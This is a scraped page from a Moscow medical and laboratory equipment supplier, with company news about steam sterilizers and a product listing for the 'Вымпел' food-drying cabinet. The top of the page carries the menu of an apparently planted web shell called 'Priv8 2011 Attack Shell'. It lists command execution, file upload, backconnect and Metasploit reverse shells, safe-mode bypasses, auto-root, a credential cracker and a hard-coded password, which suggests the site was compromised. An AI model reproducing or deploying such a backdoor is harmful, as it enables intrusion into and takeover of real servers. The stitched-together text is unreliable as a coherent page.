#Priv8 2011 Attack Shell#

Server Pagerank Site list  Cgi Shell  Python Shell  Symlink Shell  perl Bypass Tools  Auto Root  Kullanici List  ShowsourceRead  Cgi Shell Priv pass=dz  Config Shell  LitespeedBypas
  SsiBypass  SuExecByps  Wordpress Mysql Admin Shell  Joomla Mysql Admin Shell  Php Eval Bypass  Php4 Bind 8888 Eval  Cpanel+Ftp+Telnet Cracker  Safe Mode php.ini  Mini Cgi
Change Dir :
Command Execute :
Upload :
Modeminizde 22 port açik olmali : Php Backconnect 1   Php Backconnect 2  Php Backconnect 3  Php Backconnect 4  Dc Backconnect  Perlsocket  Python Bacconnect  Python izo  Metasploit Bacconnect
ООО "Мед ЛТО" - Медицинская и лабораторная техника и обслуживание.Мед техника, медицина, медицинская аппаратура, Медицинская и лабораторная техника и обслуживание, медицинская кушетка, медицинская техника, медицинские приборы, медицинское оборудование

Загрузка...

Главная Контакты Карта сайта
МедЛТО медицинская и лабораторная

Новости компании:

16/09/2017
В противовес мнению, что в кризис надо только снижать цену и применять ценовые акции, наша компания предлагает дополнительные ГАРАНТИИ от ООО " МЕДОБОРУДОВАНИЕ" - авторизированная компания с официальной гарантией на поставки и ввод в эксплуатацию стерилизационного оборудования АО "ГРПЗ- Касимовского ПЗ", АО " Тюменский завод медицинского оборудования и инструментов", ООО "Ферропласт-Медикал" , АО" Смоленское СКТБ СПУ" и т.д.
15/09/2017
Уважаемые покупатели спасибо Вам за покупки в нашей компании. Только у нас предоставляется БЕЗУСЛОВНАЯ ГАРАНТИЯ на Стерилизаторы ГП-10 МО, ГП-20 МО и ГП-20 Ох-ПЗ ( с охлаждением)! Информация по гарантии на продукцию АО "ГРПЗ- Касимовский приборный завод" размещена на сайте завода. Инженеры ООО Мед ЛТО - прошли обучение по монтажу и вводу в эксплуатацию полной линейки продукции АО "ГРПЗ- Касимовский приборный завод" В паспорте на изделия производимые АО "ГРПЗ- Касимовский приборный завод" имеется требование по вводу в эксплуатацию и монтажу специалистами имеющими специальные знания и прошедшими обучение .
01/06/2017
СТЕРИЛИЗАТОР ПАРОВОЙ НАСТОЛЬНЫЙ ГПа-10 ПЗ - СОВРЕМЕННЫЙ,АВТОМАТИЧЕСКИЙ. ОСОБЕННОСТЬЮ ГПа-10 ПЗ ЯВЛЯЕТСЯ ПРЯМОУГОЛЬНАЯ ФОРМА СТЕРИЛИЗАЦИОННОЙ КАМЕРЫ, ЧТО ПОВЫШАЕТ ПОЛЕЗНЫЙ ОБЪЕМ НА 35%, А ТАКЖЕ ПОЛНОСТЬЮ АВТОМАТИЧЕСКИЙ ЦИКЛ СТЕРИЛИЗАЦИИ ДЕЛАЮТ ЕГО НЕЗАМЕНИМЫМ ДЛЯ СТОМАТОЛОГИЧЕСКИХ КАБИНЕТОВ на 1-2 КРЕСЛА и САЛОНОВ КРАСОТЫ (МАНЕКЮР,ПЕДИКЮР),
Шкаф сушильный "ВЫМПЕЛ"
Здоровое питание круглый год!
Согласно последним исследованиям докторов количество овощей и фруктов в питании любого человека должно составлять не меньше 60%. Только ягоды, фрукты и овощи снабжают наш организм необходимыми витаминами и полезными микроэлементами.
Один из самых древних и полезных для организма способов заготовки и длительного хранения продуктов - это сушка. Большинство современных хозяек, заботящихся о здоровье своей семьи, считают сушку лучшим способом сохранения ягод, овощей, грибов и трав. Не секрет, что в правильно высушенных сухих продуктах сохраняется до 90% активных веществ, чего не дает ни один способ консервирования. Главный принцип сушки - это быстрота. Чем скорее высушен продукт, тем больше в нем остается витаминов и необходимых для организма биологически активных элементов. Погода переменчива, осенью особенно не хватает солнечных теплых дней, быстро высушить, сохранить собранный урожай оказывается трудной задачей, тем более, если продукты буквально пропитаны водой.
Здесь на помощь приходит сушильный электрошкаф "ВЫМПЕЛ". С 2010 г. завод начал выпуск модернизированных электрошкафов с применением в них импортных нагревательных элементов, которые повышают качество и надежность прибора. Электрошкаф "Вымпел" изготовлен из качественного и безопасного сырья.
Хранятся высушенные в нем продукты несколько лет без потери и ухудшения их качеств. В сушильном шкафу можно сушить овощи и фрукты, грибы, пряные и лекарственные травы и растения. Если учесть, что в сушильный шкаф можно загрузить до 12 литров продукта, то сразу можно оценить, какое это подспорье в хозяйстве.
Например, зелень готова уже через 1,5-3 часа,
лук репка - шинкование кольцами, полукольцами толщиной 3 -4 мм чеснок – 3-3,5 ч.
яблоки-груши - кольца, ломтики толщиной 5 - 6 мм – 4 - 5 ч.
морковь, свекла, капуста – соломка лента 3 - 4 мм - 3,0 – 3,5 ч.
перец болгарский - кольца толщиной 3 - 5 мм через 3- 4 ч.
баклажаны - кольца, ломтики толщиной 5 - 6 мм через 3,5- 4 ч.
шиповник, вишня, грибы - 4,0 – 5,0 ч.
Сушка происходит быстро, несмотря на невысокую температуру, и максимально сохраняет в продуктах витамины, микроэлементы, питательную ценность и другие важные качества, например, вкус, цвет и естественный аромат. Будет достаточно лишь замочить сухой продукт в чуть теплой воде, и он практически полностью восстанавливает свои свойства.
В "Вымпеле" предусмотрены три выдвижных лотка с перфорированным дном, выполенных из качественной нержавеющей стали, на которые раскладываются продукты для сушки. Под лотками находится выдвижной поддон для сбора влаги.

Технические характеристики
Потребляемая мощность - 1,5 кВт
Масса не более - 22 кг
Габаритные размеры шкафа (ДхШхВ) - 445х365х770 мм
Температура сушки - 70 С
Полезная площадь шкафа - 0,36 м2
Питание - 220/50 В/Гц
Гарантийный срок - 12 месяцев

Цена: 7 100 р.

Сертификат

Регистрационное удостоверение

<< вернуться в каталог
©ООО "Медицинская и лабораторная техника и оборудование" 2007-2013
117105, г.Москва, Нагорный пр-д., д.10А
(495)790-62-38

medlto@list.ru
ICQ 471-645-771

мед техника, медицина, медицинская аппаратура, Медицинская и лабораторная техника и обслуживание, медицинская кушетка,медицинская техника, медицинские приборы, медицинское оборудование, медкомплекс, медоборудование, медсестра, медтехника, микроскоп, облучатель обн-150, оборудование для парикмахерских стерилизатор, кушетка массажная, парикмахерское оборудование, мебель для парикмахерских, мебель для салонов красоты, косметологическое кресло, маникюрный стол, магазин для парикмахера, озоновый стерилизатор, операционный стол медицинская апаратура.